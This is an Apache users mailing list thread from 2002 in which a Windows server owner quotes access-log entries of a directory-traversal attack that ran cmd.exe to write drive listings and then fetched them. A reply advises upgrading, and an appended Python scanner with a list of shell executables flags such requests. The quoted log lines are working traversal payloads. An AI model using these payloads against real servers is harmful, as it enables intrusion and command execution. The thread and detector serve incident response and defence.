httpd-users mailing list archives

From "craig franke" <craig.fra...@harlingen.tstc.edu>
Subject Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?
Date Thu, 07 Nov 2002 15:55:49 GMT
Not sure if it is a hack... but you should probably upgrade to 2.0.43 unless you have a good
reason not to... I believe there were some vulnerabilities pertaining to Windows in some of
the versions between 2.0.39 and 2.0.43...

Craig

>>> jere@iki.fi 11/07/02 09:31AM >>>

Greetings!

I'm sorry if this is something that has already been discussed, I just 
joined the list. I tried to check out on this matter, but didn't find any 
info elsewhere.

I found some suspicious stuff from my computer. First, there were files 
named dirc.txt...dirg.txt in the root of my C:\ -drive. Plus, there was a 
copy of Windows' cmd.exe renamed as root.exe.
The txt files contained the root dir listings for the drives.

Then, I found this in my Apache log:

p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+d:>>c:\dird.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+e:>>c:\dire.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+f:>>c:\dirf.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+g:>>c:\dirg.txt HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Then I surfed to the address mentioned in the HTTP request, finding what is 
apparently some pages of a German speaking hacker (cracker?). You can type 
in an IP address and you can see the directory listings for the root drives 
for that machine. Seems it works at least with Apache 2.0.39 and Win2K that 
I'm running. Or was, took it offline when I found this out.

So the question is, what is all this? Have I forgotten some installation 
trick or what? I'm not that worried about the dir listing, but are there 
more harmful things that can be done this way?

No viruses on my computer, I'm running Symantec antivirus, database just 
updated. Also, ZoneAlarm should keep most of the unwanted guests away.

Thanks for any help,
Jere


-- 
Jere Knuuttila      They took one look at me and said, "Oh my god",
jere@iki.fi         get a haircut and get a real job!
+358 50 585 3949                         George Thorogood - Haircut
http://jere.iki.fi 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org 
   "   from the digest: users-digest-unsubscribe@httpd.apache.org 
For additional commands, e-mail: users-help@httpd.apache.org 


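The log entries quoted above show the pattern an administrator would want to hunt for across a whole access log: percent-encoded backslashes (`%5c`) and dots (`%2e`) that only resolve to `\..\` after decoding, followed by a request for `cmd.exe`. The following is an added example, not code from the thread or from the Apache project. It parses Combined Log Format lines, decodes the request path (repeatedly, so a double-encoded `%255c` is unwrapped as well), treats `\` like `/` when splitting into segments, and flags dot-dot traversal, backslash separators and requests for shell executables. The regular expression, the `SUSPICIOUS_BASENAMES` set and the `classify`/`scan` names are this example's own; the first two sample lines are taken from the quoted log with the referer dropped, the other two are constructed.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Apache Combined Log Format, the format of the entries quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Basenames that should never be the target of a web request; the thread
# mentions both cmd.exe (abused) and root.exe (the renamed copy left behind).
SUSPICIOUS_BASENAMES = {"cmd.exe", "root.exe"}

# Sample input. Lines 1-2 are taken from the quoted log (referer dropped);
# line 3 is a constructed benign request; line 4 is a constructed
# double-encoded variant (%255c decodes to %5c, then to a backslash).
SAMPLE_LINES = [
    r'p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt HTTP/1.1" 500 934 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    r'p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    r'192.0.2.10 - - [26/Oct/2002:18:30:00 +0300] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
    r'192.0.2.11 - - [26/Oct/2002:18:31:00 +0300] "GET /cgi-bin/%255c%252e%252e%255cwinnt%255csystem32%255ccmd.exe HTTP/1.1" 404 0 "-" "Mozilla/4.0"',
]


def decode_target(target: str) -> str:
    """Drop the query string and percent-decode until stable (bounded), so
    that double-encoded sequences such as %255c are unwrapped too."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line: str) -> Optional[dict]:
    """Return a finding for a suspicious request, or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not in Combined Log Format; skip rather than guess
    decoded = decode_target(m.group("target"))
    # Treat '\' like '/' so that '\..\' and '/../' yield the same segments.
    segments = [s for s in decoded.replace("\\", "/").split("/") if s]
    reasons = []
    if ".." in segments:
        reasons.append("dot-dot traversal")
    if "\\" in decoded:
        reasons.append("backslash separator")
    if segments and segments[-1].lower() in SUSPICIOUS_BASENAMES:
        reasons.append("shell executable requested")
    if not reasons:
        return None
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "status": int(m.group("status")),
        "decoded_path": decoded,
        "reasons": reasons,
    }


def scan(lines) -> list:
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(f'{finding["host"]} {finding["status"]} {finding["decoded_path"]}')
        print("   ", ", ".join(finding["reasons"]))
```

Note that the quoted log shows the `cmd.exe` requests answered with status 500, yet the `dirc.txt`...`dirg.txt` files were created anyway and the follow-up read of `dirc.txt` returned 200 with 2237 bytes. Filtering on status codes alone would therefore miss the command execution; the check above keys on the decoded path instead. Detection only confirms what happened; the remedy is the upgrade the reply recommends.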

